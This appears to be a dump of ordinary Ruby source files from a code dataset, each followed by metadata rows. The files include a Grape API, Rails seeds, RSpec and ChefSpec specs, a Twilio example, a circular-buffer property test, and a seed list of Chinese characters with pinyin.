def validate
raise ::Thrift::ProtocolException.new(::Thrift::ProtocolException::UNKNOWN, 'Required field message is unset!') unless @message
end
::Thrift::Struct.generate_accessors self
end
| 31.479638 | 208 | 0.654707 |
ac681b2b41f3c7114178b51b74b15d41b9ac891e | 545 | module WordsGenerator
module Api
class Words < Grape::API
format :json
namespace :words do
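        # GET /words responds with a JSON object such as {"words" => "blue Acme lorem"}
        # (illustrative values): a random, space-joined subset of the generated words.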
get '/' do
words = Words.generate_words
{words: words.sample(1 + rand(words.length)).join(' ')}
end
end
private
def self.generate_words
[
Forgery('basic').color,
Forgery('lorem_ipsum').word,
Forgery('name').company_name,
Forgery('name').female_first_name,
Forgery('name').industry
]
end
end
end
end
| 19.464286 | 65 | 0.537615 |
33ff29a2ce2ed6ad2b98df96a9468a8fa8338691 | 832 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
User.delete_all
Todo.delete_all
Event.delete_all
User.create(name: "Asta", zip: "86337")
Todo.create(item: "Clean Bathroom", user_id: User.first.id)
Todo.create(item: "Lunch with Charmy", user_id: User.first.id)
Todo.create(item: "Fourth Workout", user_id: User.first.id)
Event.create(title: "Nero - Birth Anniversary", date:"18/06/2021", user_id: User.first.id)
Event.create(title: "Yuno & My - Birth Anniversary", date:"10/04/2021", user_id: User.first.id) | 41.6 | 111 | 0.727163 |
acec66544907bc94fbc60acfddfa3d8082d75b34 | 911 | # frozen_string_literal: true
module GraphQL
module Language
# Emitted by the lexer and passed to the parser.
# Contains type, value and position data.
class Token
if !String.method_defined?(:-@)
using GraphQL::StringDedupBackport
end
# @return [Symbol] The kind of token this is
attr_reader :name
# @return [String] The text of this token
attr_reader :value
attr_reader :prev_token, :line, :col
def initialize(name, value, line, col, prev_token)
@name = name
@value = -value
@line = line
@col = col
@prev_token = prev_token
end
alias_method :to_s, :value
def to_i; @value.to_i; end
def to_f; @value.to_f; end
def line_and_column
[@line, @col]
end
def inspect
"(#{@name} #{@value.inspect} [#{@line}:#{@col}])"
end
end
end
end
| 23.358974 | 57 | 0.586169 |
269ba588d9809081ec3598beb60b77bd131e1740 | 4,882 | # This file was generated by the `rspec --init` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# This option will default to `:apply_to_host_groups` in RSpec 4 (and will
# have no way to turn it off -- the option exists only for backwards
# compatibility in RSpec 3). It causes shared context metadata to be
# inherited by the metadata hash of host groups and examples, rather than
# triggering implicit auto-inclusion in groups with matching metadata.
config.shared_context_metadata_behavior = :apply_to_host_groups
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
# This allows you to limit a spec run to individual examples or groups
# you care about by tagging them with `:focus` metadata. When nothing
# is tagged with `:focus`, all examples get run. RSpec also provides
# aliases for `it`, `describe`, and `context` that include `:focus`
# metadata: `fit`, `fdescribe` and `fcontext`, respectively.
config.filter_run_when_matching :focus
# Allows RSpec to persist some state between runs in order to support
# the `--only-failures` and `--next-failure` CLI options. We recommend
# you configure your source control system to ignore this file.
config.example_status_persistence_file_path = "spec/examples.txt"
# Limits the available syntax to the non-monkey patched syntax that is
# recommended. For more details, see:
# - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/
# - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode
config.disable_monkey_patching!
# This setting enables warnings. It's recommended, but in some cases may
# be too noisy due to issues in dependencies.
config.warnings = true
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = "doc"
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
end
| 49.313131 | 92 | 0.742933 |
6262b89470f63324d0845fed877db3af72e1ff3f | 532 | # Get twilio-ruby from twilio.com/docs/ruby/install
require 'twilio-ruby'
# Get your Account SID and Auth Token from twilio.com/console
# To set up environmental variables, see http://twil.io/secure
account_sid = ENV['TWILIO_ACCOUNT_SID']
auth_token = ENV['TWILIO_AUTH_TOKEN']
@client = Twilio::REST::Client.new(account_sid, auth_token)
call = @client.calls.create(url: 'http://demo.twilio.com/docs/voice.xml',
to: '+14108675310',
from: '+15005550006')
puts call.start_time
| 38 | 73 | 0.680451 |
33471eaaa2514eeaa211f88d41d9cb6a51af4615 | 2,203 | require 'rantly'
require 'rantly/rspec_extensions'
require 'rantly/shrinks'
require 'English'
PROGRAM = './circular_buffer'.freeze
FILE = 'circular_buffer.txt'.freeze
class Operation < Array
def operation
self[0]
end
def parameter
self[1]
end
def to_s
case self[0]
when :get
'get()'
when :put
"put(#{self[1]})"
when :length
'length()'
end
end
def inspect
to_s
end
end
class Rantly
def myTestData
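    # Builds one random test case: a shrinkable list of 1-8 operations
    # (e.g. [put(42), length(), get()], illustrative values) paired with a queue size in 0..9.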
Tuple.new [
Deflating.new(
array(integer % 8 + 1) do # series of operations with their parameters
Operation.new [
(choose :get, :put, :length),
integer % 65_536 # (parameters make sense only for :put)
]
end
),
integer % 10 # size of queue
]
end
end
RSpec.describe 'my circular buffer' do
it 'can do a series of operations' do
property_of { myTestData }.check do |test|
model = []
size = test[1]
`rm -f #{FILE}`
`#{PROGRAM} init #{size} 2>/dev/null`
if size.zero?
expect($CHILD_STATUS).to_not be_success
else
expect($CHILD_STATUS).to be_success
operations = test[0]
operations.each do |o|
case o.operation
when :get
value = `#{PROGRAM} get 2>/dev/null`
if model.empty?
expect($CHILD_STATUS).to_not be_success
else
expect($CHILD_STATUS).to be_success
value1 = value.to_i
value2 = model.shift
expect(value1).to be == value2
end
when :put
`#{PROGRAM} put #{o.parameter} 2>/dev/null`
if model.count >= size
expect($CHILD_STATUS).to_not be_success
else
expect($CHILD_STATUS).to be_success
model.push(o.parameter)
end
when :length
value = `#{PROGRAM} length 2>/dev/null`
expect($CHILD_STATUS).to be_success
value1 = value.to_i
value2 = model.count
expect(value1).to be == value2
end
end
end
end
end
end
| 22.479592 | 91 | 0.533364 |
188f0e623046ca983a73f17d2b35b31c2226cc68 | 1,093 | class Api::V1::Accounts::CustomFiltersController < Api::V1::Accounts::BaseController
before_action :fetch_custom_filters, except: [:create]
before_action :fetch_custom_filter, only: [:show, :update, :destroy]
DEFAULT_FILTER_TYPE = 'conversation'.freeze
def index; end
def show; end
def create
@custom_filter = current_user.custom_filters.create!(
permitted_payload.merge(account_id: Current.account.id)
)
end
def update
@custom_filter.update!(permitted_payload)
end
def destroy
@custom_filter.destroy!
head :no_content
end
private
def fetch_custom_filters
@custom_filters = current_user.custom_filters.where(
account_id: Current.account.id,
filter_type: permitted_params[:filter_type] || DEFAULT_FILTER_TYPE
)
end
def fetch_custom_filter
@custom_filter = @custom_filters.find(permitted_params[:id])
end
def permitted_payload
params.require(:custom_filter).permit(
:name,
:filter_type,
query: {}
)
end
def permitted_params
params.permit(:id, :filter_type)
end
end
| 21.86 | 84 | 0.717292 |
ff3d2c6ca3117a6519dd627e141ed0ad437a001c | 1,324 | module Asposeocrjava
module ReadPartInformationOfText
def initialize()
data_dir = File.dirname(File.dirname(File.dirname(File.dirname(__FILE__)))) + '/data/'
# Initialize an instance of OcrEngine
ocr_engine = Rjb::import('com.aspose.ocr.OcrEngine').new
# Set the Image property by loading the image from file path location
ocr_engine.setImage(Rjb::import('com.aspose.ocr.ImageStream').fromFile(data_dir + 'ocr.png'))
# Process the image
if ocr_engine.process()
# Display the recognized text
puts "Text: " + ocr_engine.getText().to_string
# Retrieve an array of recognized text by parts
text = ocr_engine.getText().getPartsInfo()
# Iterate over the text parts
i = 0
while i < text.length
symbol = text[i]
# Display part information
puts "isItalic : " + symbol.getItalic().to_s
puts "isUnderline : " + symbol.getUnderline().to_s
puts "isBold : " + symbol.getBold().to_s
puts "Text Color : " + symbol.getTextColor().to_string
puts "Quality : " + symbol.getCharactersQuality().to_s
i +=1
end
end
end
end
end
| 37.828571 | 101 | 0.573263 |
2885fba68b362c41801b4fc4eb9b2150e7c73d46 | 88 | def fib(n)
if n <= 1
n
else
fib(n - 1) + fib(n - 2)
end
end
fib(33) | 11 | 28 | 0.420455 |
1c33f5cc5bbbee81341638c884fbe16bb5009aab | 4,267 | require 'spec_helper'
describe "Properties", type: :feature, js: true do
stub_authorization!
before(:each) do
visit spree.admin_products_path
end
context "Property index" do
before do
create(:property, name: 'shirt size', presentation: 'size')
create(:property, name: 'shirt fit', presentation: 'fit')
click_link "Products"
click_link "Properties"
end
context "listing product properties" do
it "should list the existing product properties" do
within_row(1) do
expect(column_text(1)).to eq("shirt size")
expect(column_text(2)).to eq("size")
end
within_row(2) do
expect(column_text(1)).to eq("shirt fit")
expect(column_text(2)).to eq("fit")
end
end
end
context "searching properties" do
it 'should list properties matching search query' do
click_on "Filter"
fill_in "q_name_cont", with: "size"
click_on 'Search'
expect(page).to have_content("shirt size")
expect(page).not_to have_content("shirt fit")
end
end
end
context "creating a property" do
it "should allow an admin to create a new product property" do
click_link "Products"
click_link "Properties"
click_link "new_property_link"
within('.content-header') { expect(page).to have_content("New Property") }
fill_in "property_name", with: "color of band"
fill_in "property_presentation", with: "color"
click_button "Create"
expect(page).to have_content("successfully created!")
end
end
context "editing a property" do
before(:each) do
create(:property)
click_link "Products"
click_link "Properties"
within_row(1) { click_icon :edit }
end
it "should allow an admin to edit an existing product property" do
fill_in "property_name", with: "model 99"
click_button "Update"
expect(page).to have_content("successfully updated!")
expect(page).to have_content("model 99")
end
it "should show validation errors" do
fill_in "property_name", with: ""
click_button "Update"
expect(page).to have_content("Name can't be blank")
end
end
context "linking a property to a product" do
before do
create(:product)
visit spree.admin_products_path
click_icon :edit
click_link "Properties"
end
# Regression test for #2279
it "successfully create and then remove product property" do
fill_in_property
# Sometimes the page doesn't load before the all check is done
# lazily finding the element gives the page 10 seconds
expect(page).to have_css("tbody#product_properties tr:nth-child(2)")
expect(all("tbody#product_properties tr").count).to eq(2)
delete_product_property
check_property_row_count(1)
end
# Regression test for #4466
it "successfully remove and create a product property at the same time" do
fill_in_property
fill_in "product_product_properties_attributes_1_property_name", with: "New Property"
fill_in "product_product_properties_attributes_1_value", with: "New Value"
delete_product_property
# Give fadeOut time to complete
expect(page).not_to have_selector("#product_product_properties_attributes_0_property_name")
expect(page).not_to have_selector("#product_product_properties_attributes_0_value")
click_button "Update"
expect(page).not_to have_content("Product is not found")
check_property_row_count(2)
end
def fill_in_property
fill_in "product_product_properties_attributes_0_property_name", with: "A Property"
fill_in "product_product_properties_attributes_0_value", with: "A Value"
click_button "Update"
click_link "Properties"
end
def delete_product_property
accept_alert do
click_icon :delete
wait_for_ajax # delete action must finish before reloading
end
end
def check_property_row_count(expected_row_count)
click_link "Properties"
expect(page).to have_css("tbody#product_properties")
expect(all("tbody#product_properties tr").count).to eq(expected_row_count)
end
end
end
| 30.049296 | 97 | 0.682681 |
215cd121c2234c6d17e9aea6374f93907fb1437e | 1,019 | # This file is copied to spec/ when you run 'rails generate rspec:install'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../../config/environment', __FILE__)
# Prevent database truncation if the environment is production
abort('The Rails environment is running in production mode!') if Rails.env.production?
require 'rspec/core'
require 'spec_helper'
require 'rspec/rails'
require 'simplecov'
# save to CircleCI's artifacts directory if we're on CircleCI
if ENV['CIRCLE_ARTIFACTS']
dir = File.join(ENV['CIRCLE_ARTIFACTS'], 'coverage')
SimpleCov.coverage_dir(dir)
end
SimpleCov.start
ActiveRecord::Migration.maintain_test_schema!
WebMock.disable_net_connect!(allow_localhost: true)
RSpec.configure do |config|
config.include Devise::Test::ControllerHelpers, type: :controller
config.use_transactional_fixtures = true
config.infer_spec_type_from_file_location!
end
Shoulda::Matchers.configure do |config|
config.integrate do |with|
with.test_framework :rspec
with.library :rails
end
end
| 30.878788 | 86 | 0.782139 |
3902ce8f5e336f000f7890cbf631d65ea7b738b8 | 989 | # Write a method that takes a string in and returns true if the letter
# "z" appears within three letters **after** an "a". You may assume
# that the string contains only lowercase letters.
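# For example, nearby_az("abz") is true because 'z' appears two letters after
# an 'a', while nearby_az("za") is false because the 'z' comes before the 'a'.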
#
# Difficulty: medium.
def nearby_az(string)
  string.each_char.with_index do |char, index|
    next unless char == 'a'
    # Look for a 'z' within the three characters that follow this 'a'.
    return true if string[index + 1, 3].to_s.include?('z')
  end
  false
end
# These are tests to check that your code is working. After writing
# your solution, they should all print true.
puts('nearby_az("baz") == true: ' + (nearby_az('baz') == true).to_s)
puts('nearby_az("abz") == true: ' + (nearby_az('abz') == true).to_s)
puts('nearby_az("abcz") == true: ' + (nearby_az('abcz') == true).to_s)
puts('nearby_az("a") == false: ' + (nearby_az('a') == false).to_s)
puts('nearby_az("z") == false: ' + (nearby_az('z') == false).to_s)
puts('nearby_az("za") == false: ' + (nearby_az('za') == false).to_s)
| 34.103448 | 70 | 0.616785 |
acd8eee2ea747c6fa6e44434390583dcafe0c53d | 3,760 | module SimpleNavigation
module Renderer
describe Breadcrumbs do
let!(:navigation) { setup_navigation('nav_id', 'nav_class') }
let(:item) { nil }
let(:options) {{ level: :all }}
let(:output) { HTML::Document.new(raw_output).root }
let(:raw_output) { renderer.render(navigation) }
let(:renderer) { Breadcrumbs.new(options) }
before { select_an_item(navigation[item]) if item }
describe '#render' do
it "renders a 'div' tag for the navigation" do
expect(output).to have_css('div')
end
it "sets the right html id on the rendered 'div' tag" do
expect(output).to have_css('div#nav_id')
end
it "sets the right html classes on the rendered 'div' tag" do
expect(output).to have_css('div.nav_class')
end
context 'when no item is selected' do
it "doesn't render any 'a' tag in the 'div' tag" do
expect(output).not_to have_css('div a')
end
end
context 'when an item is selected' do
let(:item) { :invoices }
it "renders the selected 'a' tag" do
expect(output).to have_css('div a')
end
it "remders the 'a' tag without any html id" do
expect(output).not_to have_css('div a[id]')
end
it "renders the 'a' tag without any html class" do
expect(output).not_to have_css('div a[class]')
end
context 'and the :allow_classes_and_ids option is true' do
let(:options) {{ level: :all, allow_classes_and_ids: true }}
it "renders the 'a' tag with the selected class" do
expect(output).to have_css('div a.selected')
end
context "and the item hasn't any id explicitly set" do
it "renders the 'a' tag without any html id" do
expect(output).not_to have_css('div a[id]')
end
end
context 'and the item has an explicitly set id' do
let(:item) { :users }
it "renders the 'a' tag with an html id" do
expect(output).to have_css('div a#breadcrumb_users_link_id')
end
end
end
end
context 'and the :prefix option is set' do
let(:options) {{ prefix: 'You are here: ' }}
context 'and there are no items to render' do
let(:item) { nil }
it "doesn't render the prefix before the breadcrumbs" do
expect(raw_output).not_to match(/^<div.+>You are here: /)
end
end
context 'and there are items to render' do
let(:item) { :invoices }
it 'renders the prefix before the breadcrumbs' do
expect(raw_output).to match(/^<div.+>You are here: /)
end
end
end
context 'when a sub navigation item is selected' do
before do
allow(navigation[:invoices]).to receive_messages(selected?: true)
allow(navigation[:invoices].sub_navigation[:unpaid]).to \
receive_messages(selected?: true, selected_by_condition?: true)
end
it 'renders all items as links' do
expect(output).to have_css('div a', 2)
end
context 'when the :static_leaf option is true' do
let(:options) {{ level: :all, static_leaf: true }}
it 'renders the items as links' do
expect(output).to have_css('div a')
end
it 'renders the last item as simple text' do
expect(output).to have_css('div span')
end
end
end
end
end
end
end
| 31.596639 | 77 | 0.551596 |
03bfcec3cd7bceb772836c8a4fcd38af414a5d73 | 1,850 | require 'spec_helper'
module ChefSpec::Error
describe CommandNotStubbed do
let(:instance) { described_class.new(args: ['cat']) }
it 'raises an exception with the correct message' do
instance
expect { raise instance }.to raise_error { |error|
expect(error).to be_a(described_class)
expect(error.message).to eq <<-EOH.gsub(/^ {10}/, '')
Executing a real command is disabled. Unregistered command:
command("cat")
You can stub this command with:
stub_command("cat").and_return(...)
EOH
}
end
end
describe CookbookPathNotFound do
let(:instance) { described_class.new }
it 'raises an exception with the correct message' do
expect { raise instance }.to raise_error { |error|
expect(error).to be_a(described_class)
expect(error.message).to eq <<-EOH.gsub(/^ {10}/, '')
I could not find or infer a cookbook_path from your current working directory.
Please make sure you put your specs (tests) under a directory named 'spec' or
manually set the cookbook path in the RSpec configuration.
EOH
}
end
end
describe GemLoadError do
let(:instance) { described_class.new(gem: 'bacon', name: 'bacon') }
it 'raises an exception with the correct message' do
expect { raise instance }.to raise_error { |error|
expect(error).to be_a(described_class)
expect(error.message).to eq <<-EOH.gsub(/^ {10}/, '')
I could not load the 'bacon' gem! You must have the gem installed
on your local system before you can use the bacon plugin.
You can install bacon by running:
gem install bacon
or add bacon to your Gemfile and run the `bundle` command to install.
EOH
}
end
end
end
| 31.896552 | 88 | 0.630811 |
f72f02337cc788c49d971913a9221dfc10ee4e16 | 26,748 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
characters = [
{
id: 1,
pinyin: "ní",
simplified: "尼",
definition: "def",
created_at: "2018-10-28T06:58:31.321Z",
updated_at: "2018-10-28T06:58:31.321Z"
},
{
id: 2,
pinyin: "gēn",
simplified: "根",
definition: "def",
created_at: "2018-10-28T06:58:35.937Z",
updated_at: "2018-10-28T06:58:35.937Z"
},
{
id: 3,
pinyin: "zī",
simplified: "资",
definition: "def",
created_at: "2018-10-28T06:58:40.537Z",
updated_at: "2018-10-28T06:58:40.537Z"
},
{
id: 4,
pinyin: "lài",
simplified: "赖",
definition: "def",
created_at: "2018-10-28T06:58:43.171Z",
updated_at: "2018-10-28T06:58:43.171Z"
},
{
id: 5,
pinyin: "duó",
simplified: "夺",
definition: "def",
created_at: "2018-10-28T06:58:47.216Z",
updated_at: "2018-10-28T06:58:47.216Z"
},
{
id: 6,
pinyin: "lòu",
simplified: "漏",
definition: "def",
created_at: "2018-10-28T06:58:50.557Z",
updated_at: "2018-10-28T06:58:50.557Z"
},
{
id: 7,
pinyin: "xiù",
simplified: "绣",
definition: "def",
created_at: "2018-10-28T06:58:59.851Z",
updated_at: "2018-10-28T06:58:59.851Z"
},
{
id: 8,
pinyin: "wú",
simplified: "吴",
definition: "def",
created_at: "2018-10-28T06:59:08.296Z",
updated_at: "2018-10-28T06:59:08.296Z"
},
{
id: 9,
pinyin: "léng",
simplified: "棱",
definition: "def",
created_at: "2018-10-28T06:59:13.412Z",
updated_at: "2018-10-28T06:59:13.412Z"
},
{
id: 10,
pinyin: "chèn",
simplified: "趁",
definition: "def",
created_at: "2018-10-28T06:59:16.812Z",
updated_at: "2018-10-28T06:59:16.812Z"
},
{
id: 11,
pinyin: "hài",
simplified: "害",
definition: "def",
created_at: "2018-10-28T06:59:22.779Z",
updated_at: "2018-10-28T06:59:22.779Z"
},
{
id: 12,
pinyin: "lǒu",
simplified: "搂",
definition: "def",
created_at: "2018-10-28T06:59:26.389Z",
updated_at: "2018-10-28T06:59:26.389Z"
},
{
id: 13,
pinyin: "bēn",
simplified: "奔",
definition: "def",
created_at: "2018-10-28T06:59:30.681Z",
updated_at: "2018-10-28T06:59:30.681Z"
},
{
id: 14,
pinyin: "hé",
simplified: "和",
definition: "def",
created_at: "2018-10-28T07:01:41.138Z",
updated_at: "2018-10-28T07:01:41.138Z"
},
{
id: 15,
pinyin: "hén",
simplified: "痕",
definition: "def",
created_at: "2018-10-28T07:01:44.424Z",
updated_at: "2018-10-28T07:01:44.424Z"
},
{
id: 16,
pinyin: "dì",
simplified: "地",
definition: "def",
created_at: "2018-10-28T07:01:48.552Z",
updated_at: "2018-10-28T07:01:48.552Z"
},
{
id: 17,
pinyin: "dài",
simplified: "带",
definition: "def",
created_at: "2018-10-28T07:01:51.596Z",
updated_at: "2018-10-28T07:01:51.596Z"
},
{
id: 18,
pinyin: "dài",
simplified: "袋",
definition: "def",
created_at: "2018-10-28T07:01:52.963Z",
updated_at: "2018-10-28T07:01:52.963Z"
},
{
id: 19,
pinyin: "wù",
simplified: "物",
definition: "def",
created_at: "2018-10-28T07:02:01.672Z",
updated_at: "2018-10-28T07:02:01.672Z"
},
{
id: 20,
pinyin: "fèn",
simplified: "粪",
definition: "def",
created_at: "2018-10-28T07:02:07.240Z",
updated_at: "2018-10-28T07:02:07.240Z"
},
{
id: 21,
pinyin: "xiǎo",
simplified: "晓",
definition: "def",
created_at: "2018-10-28T07:02:12.091Z",
updated_at: "2018-10-28T07:02:12.091Z"
},
{
id: 22,
pinyin: "lì",
simplified: "立",
definition: "def",
created_at: "2018-10-28T07:02:15.727Z",
updated_at: "2018-10-28T07:02:15.727Z"
},
{
id: 23,
pinyin: "zǎi",
simplified: "宰",
definition: "def",
created_at: "2018-10-28T07:02:18.615Z",
updated_at: "2018-10-28T07:02:18.615Z"
},
{
id: 24,
pinyin: "zǎi",
simplified: "载",
definition: "def",
created_at: "2018-10-28T07:02:24.285Z",
updated_at: "2018-10-28T07:02:24.285Z"
},
{
id: 25,
pinyin: "luó",
simplified: "萝",
definition: "def",
created_at: "2018-10-28T07:03:37.988Z",
updated_at: "2018-10-28T07:03:37.988Z"
},
{
id: 26,
pinyin: "zèng",
simplified: "赠",
definition: "def",
created_at: "2018-10-28T07:03:41.852Z",
updated_at: "2018-10-28T07:03:41.852Z"
},
{
id: 27,
pinyin: "shāo",
simplified: "稍",
definition: "def",
created_at: "2018-10-28T07:03:45.366Z",
updated_at: "2018-10-28T07:03:45.366Z"
},
{
id: 28,
pinyin: "zhě",
simplified: "者",
definition: "def",
created_at: "2018-10-28T07:03:48.817Z",
updated_at: "2018-10-28T07:03:48.817Z"
},
{
id: 29,
pinyin: "wāi",
simplified: "歪",
definition: "def",
created_at: "2018-10-28T07:03:52.996Z",
updated_at: "2018-10-28T07:03:52.996Z"
},
{
id: 30,
pinyin: "fēng",
simplified: "峰",
definition: "def",
created_at: "2018-10-28T07:03:56.058Z",
updated_at: "2018-10-28T07:03:56.058Z"
},
{
id: 31,
pinyin: "pù",
simplified: "铺",
definition: "def",
created_at: "2018-10-28T07:03:58.982Z",
updated_at: "2018-10-28T07:03:58.982Z"
},
{
id: 32,
pinyin: "zá",
simplified: "砸",
definition: "def",
created_at: "2018-10-28T07:04:03.433Z",
updated_at: "2018-10-28T07:04:03.433Z"
},
{
id: 33,
pinyin: "luò",
simplified: "络",
definition: "def",
created_at: "2018-10-28T07:04:08.510Z",
updated_at: "2018-10-28T07:04:08.510Z"
},
{
id: 34,
pinyin: "fā",
simplified: "发",
definition: "def",
created_at: "2018-10-28T07:04:12.846Z",
updated_at: "2018-10-28T07:04:12.846Z"
},
{
id: 35,
pinyin: "shēn",
simplified: "深",
definition: "def",
created_at: "2018-10-28T07:04:21.523Z",
updated_at: "2018-10-28T07:04:21.523Z"
},
{
id: 36,
pinyin: "wǎ",
simplified: "瓦",
definition: "def",
created_at: "2018-10-28T07:04:25.386Z",
updated_at: "2018-10-28T07:04:25.386Z"
},
{
id: 37,
pinyin: "pā",
simplified: "趴",
definition: "def",
created_at: "2018-10-28T07:05:06.060Z",
updated_at: "2018-10-28T07:05:06.060Z"
},
{
id: 38,
pinyin: "gé",
simplified: "隔",
definition: "def",
created_at: "2018-10-28T07:05:08.661Z",
updated_at: "2018-10-28T07:05:08.661Z"
},
{
id: 39,
pinyin: "wěn",
simplified: "稳",
definition: "def",
created_at: "2018-10-28T07:05:15.048Z",
updated_at: "2018-10-28T07:05:15.048Z"
},
{
id: 40,
pinyin: "fá",
simplified: "乏",
definition: "def",
created_at: "2018-10-28T07:05:21.569Z",
updated_at: "2018-10-28T07:05:21.569Z"
},
{
id: 41,
pinyin: "fēi",
simplified: "飞",
definition: "def",
created_at: "2018-10-28T07:05:25.176Z",
updated_at: "2018-10-28T07:05:25.176Z"
},
{
id: 42,
pinyin: "péng",
simplified: "鹏",
definition: "def",
created_at: "2018-10-28T07:05:32.753Z",
updated_at: "2018-10-28T07:05:32.753Z"
},
{
id: 43,
pinyin: "gài",
simplified: "盖",
definition: "def",
created_at: "2018-10-28T07:05:36.437Z",
updated_at: "2018-10-28T07:05:36.437Z"
},
{
id: 44,
pinyin: "biàn",
simplified: "便",
definition: "def",
created_at: "2018-10-28T07:05:41.547Z",
updated_at: "2018-10-28T07:05:41.547Z"
},
{
id: 45,
pinyin: "zǐ",
simplified: "子",
definition: "def",
created_at: "2018-10-28T07:05:44.453Z",
updated_at: "2018-10-28T07:05:44.453Z"
},
{
id: 46,
pinyin: "jī",
simplified: "机",
definition: "def",
created_at: "2018-10-28T07:05:47.682Z",
updated_at: "2018-10-28T07:05:47.682Z"
},
{
id: 47,
pinyin: "gēng",
simplified: "耕",
definition: "def",
created_at: "2018-10-28T07:05:52.486Z",
updated_at: "2018-10-28T07:05:52.486Z"
},
{
id: 48,
pinyin: "wǎn",
simplified: "碗",
definition: "def",
created_at: "2018-10-28T07:05:56.198Z",
updated_at: "2018-10-28T07:05:56.198Z"
},
{
id: 49,
pinyin: "hào",
simplified: "浩",
definition: "def",
created_at: "2018-10-28T07:09:15.349Z",
updated_at: "2018-10-28T07:09:15.349Z"
},
{
id: 50,
pinyin: "háo",
simplified: "豪",
definition: "def",
created_at: "2018-10-28T07:09:16.099Z",
updated_at: "2018-10-28T07:09:16.099Z"
},
{
id: 51,
pinyin: "hěn",
simplified: "狠",
definition: "def",
created_at: "2018-10-28T07:09:20.050Z",
updated_at: "2018-10-28T07:09:20.050Z"
},
{
id: 52,
pinyin: "wǒ",
simplified: "我",
definition: "def",
created_at: "2018-10-28T07:09:24.208Z",
updated_at: "2018-10-28T07:09:24.208Z"
},
{
id: 53,
pinyin: "fēn",
simplified: "分",
definition: "def",
created_at: "2018-10-28T07:09:26.769Z",
updated_at: "2018-10-28T07:09:26.769Z"
},
{
id: 54,
pinyin: "zhòng",
simplified: "种",
definition: "def",
created_at: "2018-10-28T07:09:29.591Z",
updated_at: "2018-10-28T07:09:29.591Z"
},
{
id: 55,
pinyin: "zhōng",
simplified: "忠",
definition: "def",
created_at: "2018-10-28T07:09:31.087Z",
updated_at: "2018-10-28T07:09:31.087Z"
},
{
id: 56,
pinyin: "gǎi",
simplified: "改",
definition: "def",
created_at: "2018-10-28T07:09:34.665Z",
updated_at: "2018-10-28T07:09:34.665Z"
},
{
id: 57,
pinyin: "lù",
simplified: "陆",
definition: "def",
created_at: "2018-10-28T07:09:40.579Z",
updated_at: "2018-10-28T07:09:40.579Z"
},
{
id: 58,
pinyin: "láo",
simplified: "劳",
definition: "def",
created_at: "2018-10-28T07:09:46.399Z",
updated_at: "2018-10-28T07:09:46.399Z"
},
{
id: 59,
pinyin: "hé",
simplified: "何",
definition: "def",
created_at: "2018-10-28T07:09:52.047Z",
updated_at: "2018-10-28T07:09:52.047Z"
},
{
id: 60,
pinyin: "nǐ",
simplified: "你",
definition: "def",
created_at: "2018-10-28T12:09:28.008Z",
updated_at: "2018-10-28T12:09:28.008Z"
},
{
id: 61,
pinyin: "nì",
simplified: "逆",
definition: "def",
created_at: "2018-10-28T12:11:03.638Z",
updated_at: "2018-10-28T12:11:03.638Z"
},
{
id: 62,
pinyin: "wò",
simplified: "沃",
definition: "def",
created_at: "2018-10-28T12:11:06.389Z",
updated_at: "2018-10-28T12:11:06.389Z"
},
{
id: 63,
pinyin: "zhěng",
simplified: "整",
definition: "def",
created_at: "2018-10-28T12:11:10.071Z",
updated_at: "2018-10-28T12:11:10.071Z"
},
{
id: 64,
pinyin: "zhèng",
simplified: "症",
definition: "def",
created_at: "2018-10-28T12:11:13.115Z",
updated_at: "2018-10-28T12:11:13.115Z"
},
{
id: 65,
pinyin: "zhù",
simplified: "住",
definition: "def",
created_at: "2018-10-28T12:11:17.644Z",
updated_at: "2018-10-28T12:11:17.644Z"
},
{
id: 66,
pinyin: "tuī",
simplified: "推",
definition: "def",
created_at: "2018-10-28T12:11:25.149Z",
updated_at: "2018-10-28T12:11:25.149Z"
},
{
id: 67,
pinyin: "zǎo",
